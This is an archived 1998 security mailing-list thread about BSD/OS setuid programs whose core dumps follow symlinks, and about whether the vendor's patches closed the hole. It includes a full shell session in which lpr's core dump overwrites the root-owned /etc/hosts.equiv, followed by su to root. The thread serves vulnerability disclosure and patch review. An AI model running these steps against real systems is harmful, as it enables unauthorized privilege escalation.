Re: BSD coredumps follow symlinks

From: Ariel Biener (arielat_private)
Date: Mon Apr 06 1998 - 16:43:46 PDT

Next message: Chris Evans: "QuakeI server serious hole (yawn)"

Previous message: J.A. Gutierrez: "perfomer_tools again"
Maybe in reply to: Ronny Cook: "BSD coredumps follow symlinks"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Mon, 6 Apr 1998, Ronny Cook wrote:

> > lpr will dump core if there is no symlink there. Maybe you failed to
> > install the patch correctly?
>
> If I recall rightly, the first patch disabled the most obvious attacks, but
> allowed a core dump for a setuid program across a symbolic link *if* thefile
> existed and had 600 permissions (and was owned by the appropriate user).

You recall correctly. If one was to look at the bugtraq archives, one
would find my reply to Nir's letter, on Jun 20th '97:

`002810 97/06/20 20:53 66 Re: Core file anomalies under BSDi 3.0'


From:         Ariel Biener <arielat_private>
Subject:      Re: Core file anomalies under BSDi 3.0
X-To:         Nir Soffer <scorpiosat_private>

On Thu, 19 Jun 1997, Nir Soffer wrote:

[.snip.]
> A.) BSDi doesn't give a damn that the euid!=ruid, so finding a setgid
> program with priviliges isn't neccesary.
>
> B.) BSDi _does_ however, check if the file exists, so it's quite
> impossible to overwrite files.


Hmm, this is not my experience:

slingshot: {2} % id
uid=100(ariel) gid=20(staff) groups=20(staff), 0(wheel)
slingshot: {3} % ls -l /etc/hosts.equiv
-rw-------  1 root  wheel  0 Jun 20 22:43 /etc/hosts.equiv
slingshot: {4} % ln -s /etc/hosts.equiv lpr.core
slingshot: {5} % lpr
^Z
Suspended
slingshot: {6} % kill -ABRT %1
slingshot: {7} % fg
lpr
Abort (core dumped)
slingshot: {8} % ls -l /etc/hosts.equiv
-rw-------  1 root  wheel  167936 Jun 20 22:45 /etc/hosts.equiv
slingshot: {9} % su
Password:
Jun 20 22:46:34 slingshot su: ariel to root on /dev/ttyp0
slingshot: {1} % uname -a
BSD/OS slingshot.tau.ac.il 3.0 BSDI BSD/OS 3.0 Kernel #0: Mon Jun 16
19:51:22 IDT 1997
rootat_private:/usr/src/sys/compile/SLINGSHOT  i386

It wont work if the target file is *not* mode 0600 .

--Ariel
>
> Unfortunately, certain sensitive files (such as /etc/master.passwd) fit
> these conditions. Thus the later patch under 3.0, which disabled *any*
> core dump across a symboliclink for *any* setuid program.

Exactly. The 1st patch didn't fix it.



--Ariel
>
> Nir's test was only for a nonexistent file, which the earlier patch handles
> correctly. Unfortunately, in doing so it opens the other security hole
> which was later patched under 3.0.
>
>               ...Ronny
> --
> Ronald Cook, Technical Manager - Message Handling Systems/The Message eXchange
> Email: ronnyat_private ----- Phone: +61-2-9550-4448 ---- Fax: +61-2-9519-2551
>
> All opinions are my own and not those of TMX unless explicitly stated otherwise.
>

   +---------------------------------------------------------------+
   | Ariel Biener                                                  |
   | e-mail: arielat_private        Work ph: 03-6406086       |
   | fingerprint = 07 D1 E5 3E EF 6D E5 82 0B E9 21 D4 3C 7D 8B BC |
   +---------------------------------------------------------------+

Next message: Chris Evans: "QuakeI server serious hole (yawn)"
Previous message: J.A. Gutierrez: "perfomer_tools again"
Maybe in reply to: Ronny Cook: "BSD coredumps follow symlinks"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:48:10 PDT